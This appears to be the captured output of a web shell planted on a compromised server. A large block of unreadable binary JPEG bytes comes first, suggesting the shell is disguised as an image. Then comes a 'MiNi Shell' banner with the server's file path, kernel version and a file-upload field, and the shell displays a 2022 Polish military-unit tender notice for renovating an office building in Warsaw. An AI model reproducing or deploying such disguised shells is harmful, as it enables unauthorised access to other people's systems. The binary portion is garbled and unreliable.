JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220421/0012926601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na remoncie części parteru budynku nr 1 - biurowo-sztabowego na terenie kompleksu wojskowego 0023 przy ul. 11 Listopada 17/19 w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Jednostka Wojskowa nr 3964</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017172392</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 17/19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-909</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261 872 339</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ozjw3964@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozjw3964.wp.mil.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Wojskowa jednostka budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na remoncie części parteru budynku nr 1 - biurowo-sztabowego na terenie kompleksu wojskowego 0023 przy ul. 11 Listopada 17/19 w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d045f1d2-c14d-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00129266</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00041045/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont pomieszczeń w budynku nr 1 w kompl. ul. 11 Listopada 17/19 w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl/pn/jw3964 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl/pn/jw3964</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/strona/45-<br/>instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Załącznik Nr 8: Klauzula RODO art.13</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Załącznik Nr 9: Klauzula RODO art.14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">9/2022/Z</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Wykonanie robót budowlanych polegających na <br/>remoncie części parteru budynku nr 1 - biurowo-sztabowego na terenie <br/>kompleksu wojskowego 0023 przy ul. 11 Listopada 17/19 w Warszawie –<br/>szczegółowy opis znajduje się w Kosztorysach ofertowych uproszczonych dla <br/>poszczególnych branż (zał. nr 1.1.1, 1.1.2, 1.1.3 do SWZ), Przedmiarach<br/>kosztorysów ofertowych uproszczonych poszczególnych branż (zał. nr 1.2.1, <br/>1.2.2., 1.2.3 do SWZ) oraz Specyfikacjach Technicznych Wykonania i Odbioru <br/>Robót poszczególnych branż (zał. nr 2.1, 2.2, 2.3 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Po stwierdzeniu ważności złożonej oferty Zamawiający wybierze ofertę <br/>według poniższych kryteriów:<br/>1)Cena oferty brutto(X) – znaczenie 60%,<br/>2)Termin wykonania zamówienia (nie dłużej niż 120 dni od dnia przekazania <br/>terenu) (Z) – znaczenie 40%.<br/>Ad. 1) W przypadku kryterium nr 1 (X):<br/>a) oferta z najniższą ceną otrzymuje 60 pkt;<br/>b) pozostałe oferty są punktowane liniowo wedle formuły arytmetycznej, <br/>określonej poniżej:<br/>X = (Cn : Cb) x 60<br/>gdzie: Cn – cena najkorzystniejszej oferty,<br/>Cb – cena oferty badanej.<br/>Ad. 2) W przypadku kryterium nr 2 (Z):<br/>a) oferta z terminem wykonania zamówienia: do 80 dni - otrzymuje 40 pkt,<br/>co jest wartością maksymalną, która może zostać przyznana dla kryterium <br/>nr 2 (Z),<br/>Sprawa nr 9/2022/Z Znak sprawy: JW3964-SZP.2612.5.2022<br/>Strona 17 z 21<br/>b) oferta z terminem wykonania zamówienia: pomiędzy 81 a 90 dni -<br/>otrzymuje 30 pkt,<br/>c) oferta z terminem wykonania zamówienia: pomiędzy 91 a 100 dni -<br/>otrzymuje 20 pkt,<br/>d) oferta z terminem wykonania zamówienia: pomiędzy 101 a 110 dni -<br/>otrzymuje 10 pkt,<br/>e) oferta z terminem wykonania zamówienia: pomiędzy 111 a 120 dni -<br/>otrzymuje 0 pkt.<br/>2. Zamawiający udzieli zamówienia Wykonawcy, który uzyska największą liczbę <br/>punktów (W) wg zasady: W= X + Z</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu<br/>1. Zgodnie z art. 57 ustawy z dnia 11 września 2019 roku Prawo zamówień <br/>publicznych, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu;<br/>2. Podstawy wykluczenia - o udzielenie zamówienia mogą ubiegać się <br/>Wykonawcy, którzy:<br/>1) wykażą brak podstaw wykluczenia z powodu niespełnienia warunków <br/>określonych w art. 108 ust. 1; art. 109 ust.1 pkt 1.<br/>2) Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z <br/>postępowania, zgodnie z art. 108 ust. 1; art. 109 ust.1 pkt 1.<br/>3) W przypadkach, gdy Wykonawca wykazując spełnianie warunków udziału <br/>w postępowaniu polega na zasobach innych podmiotów, w stosunku do <br/>żadnego z tych podmiotów nie mogą występować uwarunkowania art. 108 <br/>ust. 1 pkt 1, 2, 3, 4, 5 i art. 109 ust.1 pkt 1 ustawy;<br/>3. Informacja o warunkach udziału w postępowaniu - o udzielenie zamówienia <br/>mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu, w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których <br/>spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których <br/>spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada:<br/>a) środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż:<br/>700.000,00 zł – siedemset tysięcy złotych;<br/>b) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej <br/>działalności związanej z przedmiotem zamówienia na sumę <br/>gwarancyjną nie mniejszą niż: 700.000,00 zł – siedemset tysięcy <br/>złotych.<br/>Jeżeli dotyczy: W przypadku składania oferty na więcej niż jedną część<br/>zamówienia wartość środków finansowych lub zdolności kredytowej/lub polisy <br/>ubezpieczeniowej winna być nie mniejsza niż suma wartości dla tych części. <br/>4) zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) dysponuje kadrą kierowniczą niezbędną do realizacji przedmiotu <br/>zamówienia, przedstawi informacje na temat kwalifikacji kadry wraz z <br/>kopiami uprawnień budowlanych w wymaganych specjalnościach <br/>budowlanych, aktualne zaświadczenia o wpisie na listę członków <br/>właściwej izby samorządu zawodowego oraz dokument <br/>potwierdzający spełnienie warunku określonego art. 37 c Ustawy <br/>o ochronie zabytków i opiece nad zabytkami (Dz. U. 2021 r., <br/>poz. 710);<br/>b) w okresie ostatnich 5 lat wykonał z należytą starannością minimum 2 <br/>zamówienia polegające na wykonaniu robót budowlanych w obiekcie <br/>zabytkowym odpowiadających przedmiotowi zamówienia o wartości <br/>nie mniejszej niż: 700.000,00 zł brutto każde zamówienie oraz, na <br/>potwierdzenie tego przedstawi referencje z wykonanych robót <br/>budowlanych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5) polisę ubezpieczeniową potwierdzającą, że Wykonawca jest <br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej <br/>działalności związanej z przedmiotem zamówienia na sumę <br/>gwarancyjną nie mniejszą niż 700.000,00 zł. wraz z dowodem <br/>opłacenia składki wynikającej z umowy ubezpieczenia. <br/>6) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej <br/>wysokość posiadanych środków finansowych lub zdolność kredytową <br/>Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem <br/>terminu składania ofert. Z informacji banku bądź kasy <br/>oszczędnościowo-kredytowej musi wynikać jednoznacznie, iż <br/>Wykonawca posiada środki finansowe lub zdolność kredytową w <br/>wysokości minimum: 700.000,00 zł.;<br/>7) aktualne zaświadczenie właściwego naczelnika Urzędu <br/>Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, <br/>potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem <br/>podatków, opłat oraz składek na ubezpieczenie zdrowotne lub <br/>społeczne, lub zaświadczeń, że uzyskał przewidziane prawem <br/>zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub <br/>wstrzymanie w całości wykonania decyzji właściwego organu –<br/>wystawionych nie wcześniej niż 3 miesiące przed upływem terminu <br/>składania ofert;<br/>8) wykaz robót budowlanych prowadzonych w obiekcie zabytkowym<br/>(minimum 2 zamówienia o wartości minimum 700.000,00 zł brutto<br/>każde zamówienie) wykonane nie wcześniej niż w okresie ostatnich 5 <br/>lat wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/>oraz podmiotów, na rzecz których roboty te zostały wykonane <br/>Do wykazu Wykonawca dołącza dowody określające czy roboty te <br/>zostały wykonane należycie. <br/>9) wykaz osób (kadry kierowniczej), które będą uczestniczyć w realizacji <br/>zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych Do wykazu Wykonawca dołączy kopie uprawnień budowlanych <br/>w wymaganych specjalnościach, aktualne zaświadczenie o wpisie na <br/>listę członków właściwej izby samorządu zawodowego oraz dokument <br/>potwierdzający spełnienie warunku określonego art. 37 c Ustawy o <br/>ochronie zabytków i opiece nad zabytkami (Dz. U. 2021 r., poz. 710)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) informację z KRS w zakresie określonym w art. 108 ust. 1 pkt 1 ustawy, art. 108 ust. 1 pkt 4 ustawy, odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – wystawionej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, <br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076) z innym Wykonawcą, który złożył odrębną ofertę w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>3) oświadczenie Wykonawcy o braku wydania wobec niego <br/>prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o <br/>zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia <br/>społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku <br/>lub decyzji - dokumentów potwierdzających dokonanie płatności tych <br/>należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie <br/>wiążącego porozumienia w sprawie spłat tych należności (w zakresie <br/>art. 108 ust. 1 pkt 3 ustawy;<br/>4) oświadczenie Wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie <br/>podstaw wykluczenia z postępowania określonych w:<br/>- art. 108 ust. 1 pkt 3 ustawy,<br/>- art. 108 ust. 1 pkt 4 ustawy odnośnie do orzeczenia zakazu ubiegania <br/>się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy odnośnie zawarcia z innymi wykonawcami <br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w wysokości 10.000 zł (dziesięć<br/>tysięcy złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się o udzielenie zamówienia<br/>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia:<br/>1) warunek dotyczący uprawnień do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 <br/>ustawy, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do <br/>prowadzenia określonej działalności gospodarczej lub zawodowej i <br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane;<br/>2) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o <br/>udzielenie zamówienia mogą polegać na zdolnościach tych z <br/>wykonawców, którzy wykonają usługi, do realizacji których te zdolności są <br/>wymagane;<br/>3) w przypadku, o którym mowa w pkt 1 i 2, wykonawcy wspólnie ubiegający <br/>się o udzielenie zamówienia dołączają odpowiednio do oferty <br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni <br/>wykonawcy.<br/>Wykonawcy składają oświadczenia (o ile dotyczy) w oryginale w postaci <br/>dokumentu elektronicznego opatrzonego kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby <br/>upoważnione do reprezentowania wykonawców zgodnie z formą <br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy <br/>organizacyjnej lub w innym dokumencie.<br/>Uwaga! Warunek dot. braku podstaw wykluczenia z postępowania powinien <br/>spełniać każdy z Wykonawców samodzielnie. <br/>2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu <br/>wykonawca może polegać na potencjale podmiotu trzeciego na zasadach <br/>opisanych w art. 118–123 ustawy. Podmiot trzeci, na potencjał którego <br/>wykonawca powołuje się w celu wykazania spełnienia warunków udziału w <br/>postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust.1. <br/>pkt 1,2,3,4,5 i art. 109 ust.1 pkt 1 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektem umowy stanowiącym załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa zamawiającego https://platformazakupowa.pl/pn/jw3964</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com